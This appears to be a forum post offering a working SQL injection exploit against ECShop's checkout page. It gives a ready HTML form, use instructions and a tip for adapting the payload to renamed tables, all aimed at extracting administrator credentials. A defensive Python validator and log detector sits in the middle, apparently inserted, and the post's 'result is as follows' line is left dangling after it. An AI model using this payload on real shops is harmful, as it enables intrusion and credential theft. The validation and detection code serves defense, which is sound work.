ecshop injection vulnerability: exploitation method & EXP
Injection: the shopping cart must contain at least one item!!!
Log in to the target site, register, add any item to the cart, then proceed to checkout. Save the code below as an html file and you can inject.
<form name="form1" method="post">
ECSHOP all-version injection vulnerability, simple EXP [ Silic Group Hacker Army ]<input name="country" type="text" style="display:none" value="1"/><br />
<textarea rows="5" style="font-family:Times New Roman;font-size:14pt;" cols="80" name="province">11'and(select 1 from(select count(*),concat(floor(rand(0)*2),0x3a,(select(select(SELECT concat(user_name,0x3a,password)FROM ecs_admin_user limit 0,1))from information_schema.tables limit 0,1))x from information_schema.tables group by x)a) and 1=1#</textarea>
<input name="district" type="text" style="display:none" value="1294"/>
<input name="consignee" type="text" style="display:none" value="1111111"/>
<input name="email" type="text" style="display:none" value="silic@blackbap.com"/>
<input name="address" type="text" style="display:none" value="111111"/>
<input name="tel" type="text" style="display:none" value="1111111"/>
<input name="step" type="text" style="display:none" value="consignee"/>
<input name="act" type="text" style="display:none" value="checkout"/><br /><br />
Address:<input name="theAction" type="text" id="theAction" value="http://xxx.com/flow.php?step=consignee" size="50"><br /><br />
<input type="submit" value="Ship to this address" onClick="this.form.action=this.form.theAction.value;" name="Submit"><br/><br />
</form>
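The weakness the form above abuses is that the region selectors of the consignee step (country, province, district) are numeric IDs that the application copies into the region lookup query as text. The following is an added defensive example, not code from the original post or from ECShop: it shows the server-side check that closes the hole (integer validation plus a parameterized query against a constructed stand-in for the region table, using sqlite) and a small log-side detector that flags POST bodies carrying the error-based signature used on this page (floor(rand(0)*2) fed into GROUP BY, information_schema references, 0x3a separators in concat). The log format, client addresses and table contents are constructed for the example; the field names and the flow.php path come from the form above.

```python
"""
Defensive companion to the flow.php?step=consignee injection (added example).

1. validate_region_id() / lookup_region(): the fix. Region fields are decimal
   IDs, so anything else is rejected before SQL is built, and the query itself
   is parameterized.
2. find_error_based_sqli(): a detector run over constructed access-log lines
   that flags the error-based payload pattern shown on this page.
"""
import re
import sqlite3
from urllib.parse import parse_qs

# The three region selectors on the consignee step carry numeric IDs only.
REGION_FIELDS = ("country", "province", "district")

# Signatures of the error-based technique: a floor(rand(0)*2) key pushed into
# GROUP BY so MySQL raises a duplicate-entry error that echoes the concatenated
# value, plus the information_schema / 0x3a separators that usually go with it.
ERROR_BASED_SIGNATURES = {
    "floor(rand(0)*2) with group by": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*group\s+by", re.I | re.S),
    "information_schema reference": re.compile(r"information_schema", re.I),
    "hex separator in concat": re.compile(r"concat\s*\(.*0x3a", re.I | re.S),
}


def validate_region_id(value):
    """Accept only a plain decimal integer of sane length; raise on anything else."""
    if not isinstance(value, str) or not re.fullmatch(r"\d{1,10}", value):
        raise ValueError(f"invalid region id: {value!r}")
    return int(value)


def is_valid_region_id(value):
    """Boolean wrapper around validate_region_id() for callers that only need yes/no."""
    try:
        validate_region_id(value)
        return True
    except ValueError:
        return False


def build_region_db():
    """Constructed in-memory stand-in for the ecs_region table (not ECShop's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ecs_region (region_id INTEGER PRIMARY KEY, region_name TEXT)")
    conn.executemany("INSERT INTO ecs_region VALUES (?, ?)", [
        (1, "Constructed country"), (11, "Constructed province"), (1294, "Constructed district"),
    ])
    return conn


def lookup_region(conn, raw_id):
    """Validated input plus a parameterized query: request text never becomes SQL."""
    region_id = validate_region_id(raw_id)
    return conn.execute(
        "SELECT region_id, region_name FROM ecs_region WHERE region_id = ?", (region_id,)
    ).fetchone()


# Constructed log entries: client, quoted request line, URL-encoded POST body.
LOG_LINES = [
    '203.0.113.5 "POST /flow.php?step=consignee" country=1&province=11&district=1294&step=consignee&act=checkout',
    '203.0.113.9 "POST /flow.php?step=consignee" country=1&province=11%27and%28select+1+from%28select+count%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%27x%27%29x+from+information_schema.tables+group+by+x%29a%29%23&district=1294&step=consignee&act=checkout',
    '198.51.100.7 "POST /flow.php?step=consignee" country=1&province=11%20or%201%3D1&district=1294&step=consignee&act=checkout',
]

LOG_RE = re.compile(r'^(\S+) "(\S+) (\S+)" (.*)$')


def find_error_based_sqli(lines):
    """Return one finding per region field whose value is non-numeric or carries a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, path, body = m.groups()
        if method != "POST" or not path.startswith("/flow.php"):
            continue
        params = parse_qs(body, keep_blank_values=True)  # decodes %27, +, etc.
        for field in REGION_FIELDS:
            for value in params.get(field, []):
                reasons = []
                if not is_valid_region_id(value):
                    reasons.append("non-numeric region id")
                for name, pattern in ERROR_BASED_SIGNATURES.items():
                    if pattern.search(value):
                        reasons.append(name)
                if reasons:
                    findings.append({"client": client, "field": field, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_error_based_sqli(LOG_LINES):
        print(finding)
```

The detector deliberately reports two levels: a region value that is not a plain integer is already a policy violation worth logging, and the error-based signatures on top of it identify this particular technique. On a real deployment the same integer validation belongs in the application before any region query is built, which is what lookup_region() demonstrates.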
The result is as follows:
ropin:
One more thing: if it does not work, look carefully at the error message: MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT region_id, region_name FROM `asky880`.`jf_region` WHERE r. See that? This site changed the default name of the database, so the exp has to be changed accordingly: change ecs_admin_user to jf_admin_user.